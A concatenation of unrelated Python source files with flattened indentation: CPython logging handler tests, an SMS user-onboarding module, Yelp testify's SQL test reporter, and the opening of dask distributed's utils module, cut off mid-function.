self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
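# Sketch of the caching behaviour tested above (in a fresh interpreter):
# getEffectiveLevel() walks up to the first ancestor with an explicit
# level, and isEnabledFor() memoizes its answers in logger._cache until a
# setLevel()/disable() call clears every cache.
def _demo_level_cache():
    parent = logging.getLogger('demo')
    child = logging.getLogger('demo.child')  # NOTSET: defers to parent
    parent.setLevel(logging.WARNING)
    assert child.getEffectiveLevel() == logging.WARNING
    assert not child.isEnabledFor(logging.INFO)
    assert child._cache == {logging.INFO: False}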
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxBytes is zero, rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
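# Sketch of the hook contract exercised by test_rotator: on rollover the
# handler passes each backup filename through `namer` and, when set,
# delegates the move itself to `rotator(source, dest)`. The gzip module
# gives the same effect as the zlib-based rotator above.
def _make_gzip_rotating_handler(path, max_bytes=1024, backups=3):
    import gzip
    handler = logging.handlers.RotatingFileHandler(
        path, maxBytes=max_bytes, backupCount=backups)
    handler.namer = lambda name: name + '.gz'
    def rotator(source, dest):
        with open(source, 'rb') as sf, gzip.open(dest, 'wb') as df:
            df.write(sf.read())
        os.remove(source)
    handler.rotator = rotator
    return handler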
class TimedRotatingFileHandlerTest(BaseFileTest):
# additional test_compute_rollover_* methods are generated and attached below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
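# The loop above stamps one test_compute_rollover_<when> method onto
# TimedRotatingFileHandlerTest per interval; the `when=when, exp=exp`
# default arguments freeze each iteration's values inside the closure.
# The W0 expectation decomposes as: roll over at the next midnight
# (hours=24 from the epoch), then wait days=4 more so the rollover lands
# at the midnight that ends the next Monday (the epoch starts on a
# Thursday).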
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
new_user.py
|
from time import sleep
from threading import Thread
from mongolia.errors import DatabaseConflictError
from conf.settings import BYPASS_START_WORDS
from constants.exceptions import BadPhoneNumberError
from backend.outgoing.dispatcher import (send_welcome, send_waitlist,
send_bad_access_code, send_pending)
from constants.parser_consts import START_WORDS
from database.backbone.cohorts import Cohort, ID_KEY
from database.tracking.access_codes import AccessCode
from database.tracking.users import User, Status
from utils.formatters import parser_format, phone_humanize
from utils.codes import looks_like_an_access_code
from backend.features.schedule_features import run_on_user_creation_schedules
from backend.admin_portal.common_helpers import raise_400_error, validate_cohort
from utils.logging import log_warning
from utils.time import now
from constants.cohorts import CohortStatus
def new_user_via_sms(phonenum, ic_number, message_text, curr_time, delay=True):
cohort = Cohort(ic_numbers=ic_number)
# Access codes not deployed
#if cohort["access_code_required"] or looks_like_an_access_code(message_text):
# user = handle_access_code(phonenum, ic_number, cohort, message_text)
if cohort["enableable_from_sms"] and (parser_format(message_text) in START_WORDS or BYPASS_START_WORDS):
user = User.create(phonenum, cohort[ID_KEY], status=Status.active)
else:
user = User.create(phonenum, cohort[ID_KEY], status=Status.pending)
user["needs_review"] = True
# TODO: refactor the following two lines
user["custom_attributes"] = cohort["custom_attributes"]
user.save()
#if cohort["status"] == CohortStatus.active:
if user["status"] == Status.active:
onboard_user(user, curr_time, delay)
elif user["status"] == Status.pending and cohort["enableable_from_sms"]: send_pending(user)
# Should not hit these two lines yet, since we don't have waitlist/invalid currently implemented
elif user["status"] == Status.waitlist: send_waitlist(user)
elif user["status"] == Status.invalid: send_bad_access_code(user)
return user
def handle_access_code(phonenum, ic_number, cohort, message_text):
access_code = parser_format(message_text).upper()
access_code = AccessCode.retrieve(access_code)
if access_code is None or not access_code.valid(ic_number):
user = User.create(phonenum, cohort[ID_KEY], status=Status.invalid)
return user
access_code_cohort = access_code.get_cohort()
if access_code_cohort is not None: cohort = access_code_cohort
user = User.create(phonenum, cohort[ID_KEY], status=Status.active)
user["access_code"] = access_code[ID_KEY]
access_code["user"] = user["phonenum"]
user.save()
access_code.save()
return user
def handle_access_code_resubmit(user, message_text):
curr_time = now()
access_code = parser_format(message_text).upper()
access_code = AccessCode.retrieve(access_code)
if access_code is None or not access_code.valid(user["ic_number"]):
return False
user.update(cohort_id=access_code["cohort_id"], access_code=access_code[ID_KEY])
user.set_status(Status.active)
access_code["user"] = user["phonenum"]
access_code.save()
onboard_user(user, curr_time)
return user
def new_user_via_admin_portal(phonenum, cohort_id, curr_time, delay=True):
try:
user = User.retrieve(phonenum=phonenum, cohort_id=cohort_id)
# if phone number is invalid
except BadPhoneNumberError:
raise_400_error("Invalid phone number.")
except DatabaseConflictError:
# alert engineering to this potential problem
log_warning(("Multiple users were returned for User.retrieve() via new_user_via_admin_portal():\n\n" +
"Phone Number: %s\nCohort ID: %s\n Current Time: %s" % (phonenum, cohort_id, curr_time)))
# alert admin user to not being able to create new user
raise_400_error("A user with phone number '%s' already exists." % phone_humanize(phonenum))
# if user already exists, raise error
if user:
raise_400_error("A user with phone number '%s' already exists." % phone_humanize(phonenum))
else:
cohort = validate_cohort(cohort_id)
user = User.create(phonenum, cohort[ID_KEY], status=Status.active)
onboard_user(user, curr_time, delay)
return user
def onboard_user(user, curr_time, delay=True):
if user.is_active() and user.cohort_is_active(): # cohort status is checked every time, so TODO: optimize
thread = Thread(target=_onboard_user_core, args=(user, curr_time, delay))
thread.start()
if not delay:
thread.join()
def _onboard_user_core(user, curr_time, delay):
send_welcome(user)
user.update(onboarded=True)
run_on_user_creation_schedules(user, curr_time, delay=delay)
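# Illustrative call sequence (phone numbers and message are hypothetical):
# an inbound-SMS handler would resolve the cohort from the receiving
# number and delegate here, e.g.
#
#   user = new_user_via_sms('+15551234567', ic_number='+15550001111',
#                           message_text='START', curr_time=now())
#
# With delay=False, onboard_user() joins its worker thread, so welcome
# messages are fully sent before the call returns (useful in tests).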
|
sql_reporter.py
|
# Copyright 2009 Yelp
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import logging
import sqlalchemy as SA
from testify import test_reporter
try:
import simplejson as json
_hush_pyflakes = [json]
del _hush_pyflakes
except ImportError:
import json
import yaml
import time
import threading
import Queue
metadata = SA.MetaData()
Tests = SA.Table('tests', metadata,
SA.Column('id', SA.Integer, primary_key=True, autoincrement=True),
SA.Column('module', SA.String(255)),
SA.Column('class_name', SA.String(255)),
SA.Column('method_name', SA.String(255)),
)
SA.Index('ix_individual_test', Tests.c.module, Tests.c.class_name, Tests.c.method_name, unique=True)
Failures = SA.Table('failures', metadata,
SA.Column('id', SA.Integer, primary_key=True, autoincrement=True),
SA.Column('error', SA.Text, nullable=False),
SA.Column('traceback', SA.Text, nullable=False),
SA.Column('hash', SA.String(40), unique=True, nullable=False),
)
Builds = SA.Table('builds', metadata,
SA.Column('id', SA.Integer, primary_key=True, autoincrement=True),
SA.Column('buildbot', SA.Integer, nullable=False),
SA.Column('buildnumber', SA.Integer, nullable=False),
SA.Column('buildname', SA.String(40), nullable=False),
SA.Column('branch', SA.String(255), index=True, nullable=False),
SA.Column('revision', SA.String(40), index=True, nullable=False),
SA.Column('end_time', SA.Integer, index=True, nullable=True),
SA.Column('run_time', SA.Float, nullable=True),
SA.Column('method_count', SA.Integer, nullable=True),
SA.Column('submit_time', SA.Integer, index=True, nullable=True),
SA.Column('discovery_failure', SA.Boolean, default=False, nullable=True),
)
SA.Index('ix_individual_run', Builds.c.buildbot, Builds.c.buildname, Builds.c.buildnumber, Builds.c.revision, unique=True)
TestResults = SA.Table('test_results', metadata,
SA.Column('id', SA.Integer, primary_key=True, autoincrement=True),
SA.Column('test', SA.Integer, index=True, nullable=False),
SA.Column('failure', SA.Integer, index=True),
SA.Column('build', SA.Integer, index=True, nullable=False),
SA.Column('end_time', SA.Integer, index=True, nullable=False),
SA.Column('run_time', SA.Float, index=True, nullable=False),
SA.Column('runner_id', SA.String(255), index=True, nullable=True),
SA.Column('previous_run', SA.Integer, index=False, nullable=True),
)
SA.Index('ix_build_test_failure', TestResults.c.build, TestResults.c.test, TestResults.c.failure)
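# Sketch of the usual read path over this schema (assumes a connection
# bound elsewhere): join TestResults back to Tests and Failures to list
# the failing methods of one build, e.g.
#
#   SA.select(
#       [Tests.c.method_name, Failures.c.error, TestResults.c.run_time],
#       SA.and_(TestResults.c.build == build_id,
#               TestResults.c.test == Tests.c.id,
#               TestResults.c.failure == Failures.c.id),
#   )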
def md5(s):
return hashlib.md5(s.encode('utf8') if isinstance(s, unicode) else s).hexdigest()
class SQLReporter(test_reporter.TestReporter):
def __init__(self, options, *args, **kwargs):
dburl = options.reporting_db_url or SA.engine.url.URL(**yaml.safe_load(open(options.reporting_db_config)))
create_engine_opts = kwargs.pop('create_engine_opts', {
'poolclass' : kwargs.pop('poolclass', SA.pool.NullPool),
'pool_recycle' : 3600,
})
self.engine = SA.create_engine(dburl, **create_engine_opts)
self.conn = self.engine.connect()
metadata.create_all(self.engine)
self.build_id = self.create_build_row(options.build_info)
self.start_time = time.time()
# Cache of (module,class_name,method_name) => test id
self.test_id_cache = dict(
((row[Tests.c.module], row[Tests.c.class_name], row[Tests.c.method_name]), row[Tests.c.id])
for row in self.conn.execute(Tests.select())
)
self.result_queue = Queue.Queue()
self.ok = True
self.reporting_frequency = options.sql_reporting_frequency
self.batch_size = options.sql_batch_size
self.reporting_thread = threading.Thread(target=self.report_results)
self.reporting_thread.daemon = True
self.reporting_thread.start()
super(SQLReporter, self).__init__(options, *args, **kwargs)
def create_build_row(self, build_info):
if not build_info:
raise ValueError("Build info must be specified when reporting to a database.")
info_dict = json.loads(build_info)
results = self.conn.execute(Builds.insert({
'buildbot' : info_dict['buildbot'],
'buildnumber' : info_dict['buildnumber'],
'branch' : info_dict['branch'],
'revision' : info_dict['revision'],
'submit_time' : info_dict.get('submitstamp'),
'buildname' : info_dict['buildname'],
}))
return results.lastrowid
def test_counts(self, test_case_count, test_method_count):
"""Store the number of tests so we can determine progress."""
self.conn.execute(SA.update(Builds,
whereclause=(Builds.c.id == self.build_id),
values={
'method_count' : test_method_count,
}
))
def test_complete(self, result):
"""Insert a result into the queue that report_results pulls from."""
self.result_queue.put(result)
def test_discovery_failure(self, exc):
"""Set the discovery_failure flag to True."""
self.conn.execute(SA.update(Builds,
whereclause=(Builds.c.id == self.build_id),
values={
'discovery_failure' : True,
}
))
def report_results(self):
    """Worker loop, run in a separate thread, that writes queued results to the database."""
    def create_row_to_insert(result, previous_run_id=None):
        """Create a TestResults row from a test result dict, linking the previous run if given."""
return {
'test' : get_test_id(result['method']['module'], result['method']['class'], result['method']['name']),
'failure' : get_failure_id(result['exception_info']),
'build' : self.build_id,
'end_time' : result['end_time'],
'run_time' : result['run_time'],
'runner_id' : result['runner_id'],
'previous_run' : previous_run_id,
}
def get_test_id(module, class_name, method_name):
"""Get the ID of the Tests row that corresponds to this test. If the row doesn't exist, insert one"""
cached_result = self.test_id_cache.get((module, class_name, method_name), None)
if cached_result is not None:
return cached_result
query = SA.select(
[Tests.c.id],
SA.and_(
Tests.c.module == module,
Tests.c.class_name == class_name,
Tests.c.method_name == method_name,
)
)
# Most of the time, the Tests row will already exist for this test (it has been run before).
row = conn.execute(query).fetchone()
if row:
return row[Tests.c.id]
else:
# Not there (this test hasn't been run before); create it
results = conn.execute(Tests.insert({
'module' : module,
'class_name' : class_name,
'method_name' : method_name,
}))
# and then return it.
return results.lastrowid
def get_failure_id(exception_info):
"""Get the ID of the failure row for the specified exception."""
if not exception_info:
return None
exc_hash = md5(''.join(exception_info))
query = SA.select(
[Failures.c.id],
Failures.c.hash == exc_hash,
)
row = conn.execute(query).fetchone()
if row:
return row[Failures.c.id]
else:
# We haven't inserted this row yet; insert it and use the generated id.
results = conn.execute(Failures.insert({
'hash' : exc_hash,
'error' : exception_info[-1].strip(),
'traceback': ''.join(exception_info),
}))
return results.lastrowid
def insert_single_run(result):
"""Recursively insert a run and its previous runs."""
previous_run_id = insert_single_run(result['previous_run']) if result['previous_run'] else None
results = conn.execute(TestResults.insert(create_row_to_insert(result, previous_run_id=previous_run_id)))
return results.lastrowid
conn = self.engine.connect()
while True:
results = []
# Block until there's a result available.
results.append(self.result_queue.get())
# Grab any more tests that come in during the next self.reporting_frequency seconds.
time.sleep(self.reporting_frequency)
try:
while True:
results.append(self.result_queue.get_nowait())
except Queue.Empty:
pass
# Insert any previous runs, if necessary.
for result in filter(lambda x: x['previous_run'], results):
try:
result['previous_run_id'] = insert_single_run(result['previous_run'])
except Exception as e:
logging.error("Exception while reporting results: " + repr(e))
self.ok = False
chunks = (results[i:i+self.batch_size] for i in xrange(0, len(results), self.batch_size))
for chunk in chunks:
try:
conn.execute(TestResults.insert(),
[create_row_to_insert(result, result.get('previous_run_id', None)) for result in chunk]
)
except Exception as e:
logging.error("Exception while reporting results: " + repr(e))
self.ok = False
finally:
# Do this in finally so we don't hang at report() time if we get errors.
for _ in xrange(len(chunk)):
self.result_queue.task_done()
def report(self):
self.end_time = time.time()
self.result_queue.join()
query = SA.update(Builds,
whereclause=(Builds.c.id == self.build_id),
values={
'end_time' : self.end_time,
'run_time' : self.end_time - self.start_time,
}
)
self.conn.execute(query)
return self.ok
# Hooks for plugin system
def add_command_line_options(parser):
parser.add_option("--reporting-db-config", action="store", dest="reporting_db_config", type="string", default=None, help="Path to a yaml file describing the SQL database to report into.")
parser.add_option('--reporting-db-url', action="store", dest="reporting_db_url", type="string", default=None, help="The URL of a SQL database to report into.")
parser.add_option("--build-info", action="store", dest="build_info", type="string", default=None, help="A JSON dictionary of information about this build, to store in the reporting database.")
parser.add_option("--sql-reporting-frequency", action="store", dest="sql_reporting_frequency", type="float", default=1.0, help="How long to wait between SQL inserts, at a minimum")
parser.add_option("--sql-batch-size", action="store", dest="sql_batch_size", type="int", default="500", help="Maximum number of rows to insert at any one time")
def build_test_reporters(options):
if options.reporting_db_config or options.reporting_db_url:
return [SQLReporter(options)]
else:
return []
# vim: set ts=4 sts=4 sw=4 et:
|
utils.py
|
from __future__ import print_function, division, absolute_import
import atexit
from collections import deque
from contextlib import contextmanager
from datetime import timedelta
import functools
from hashlib import md5
import inspect
import json
import logging
import multiprocessing
from numbers import Number
import operator
import os
import re
import shutil
import socket
from time import sleep
from importlib import import_module
import sys
import tempfile
import threading
import warnings
import weakref
import six
import tblib.pickling_support
from .compatibility import cache_from_source, getargspec, invalidate_caches, reload
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
import toolz
import tornado
from tornado import gen
from tornado.ioloop import IOLoop
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import Queue, PY3, PY2, get_thread_identity, unicode
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if PY3 and not sys.platform.startswith("win") and "PyPy" not in sys.version:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
ctx.set_forkserver_preload(preload)
else:
ctx = multiprocessing
return ctx
mp_context = _initialize_mp_context()
def funcname(func):
"""Get the name of a function."""
while hasattr(func, "func"):
func = func.func
try:
return func.__name__
except AttributeError:
return str(func)
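# e.g. funcname(functools.partial(operator.add, 1)) returns 'add':
# functools.partial objects chain through their .func attribute, so the
# loop above unwraps arbitrarily nested partials before reading __name__.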
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in getargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family, default):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
# XXX Should first try getaddrinfo() on socket.gethostname() and getfqdn()
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to %r: %s" % (host, default, e),
RuntimeWarning,
)
return default
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET, default="127.0.0.1")
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6, default="::1")
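# Connecting a UDP socket never sends a packet; it only asks the kernel to
# choose the local interface that would route to *host*, which is why the
# lookup above works without generating traffic. A minimal standalone
# version of the same trick:
def _demo_local_ip():
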